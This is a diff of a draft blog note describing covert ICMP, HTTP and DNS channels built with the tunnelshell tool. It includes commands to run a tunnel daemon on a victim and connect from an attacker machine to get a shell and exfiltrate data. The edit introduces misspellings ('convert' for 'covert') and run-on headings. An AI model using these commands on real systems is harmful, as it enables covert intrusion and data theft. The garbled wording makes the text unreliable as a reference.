cotes2020/jekyll-theme-chirpy/_posts/00Basic/draft.md

   - It will notice the ICMP echo request and reply packet is being travelled between both endpoints.
-   - If analysis these packets, you will be able to see what kind of payload is travelling as ICMP data.
+   - If analysis these packets, you will be able to see what kind of payload is travelling as ICMP data. convert HTTP Channel
- Covert HTTP Channel
 It establishes a virtual TCP connection without using three-way handshakes.
 It doesn’t bind any port, so you can use a port already use it by another process, therefore execute the below command:
   - sudo ./tunneld -t tcp -p 80,2000
 To connect with tunnelshell
   - execute the following command on the server (Attacker’s machine)
-  - it will establish a covert channel for data exfiltration.
+  - it will establish a convert channel for data exfiltration.
   - ./tunnel -t tcp -p 80,2000 10.10.10.2
 ⁃
    - It is successfully connected to 10.10.10.2, attacker is able to access the shell of the victim’s machine.
-Wireshark: you will notice a tcp communication establish without three-way-handshake between source and destination..
+Wireshark: you will notice a tcp communication establish without three-way-handshake between source and destination.. convert DNS Channel
- Covert DNS Channel
-To establish DNS covert channel, need to run UDP tunnel mode on both endpoint machines.
+To establish DNS convert channel, need to run UDP tunnel mode on both endpoint machines.
 Execute command on the victim’s machine:
   - sudo ./tunneld -t udp -p 53,2000
 Similarly, execute following on your (Attacker) machine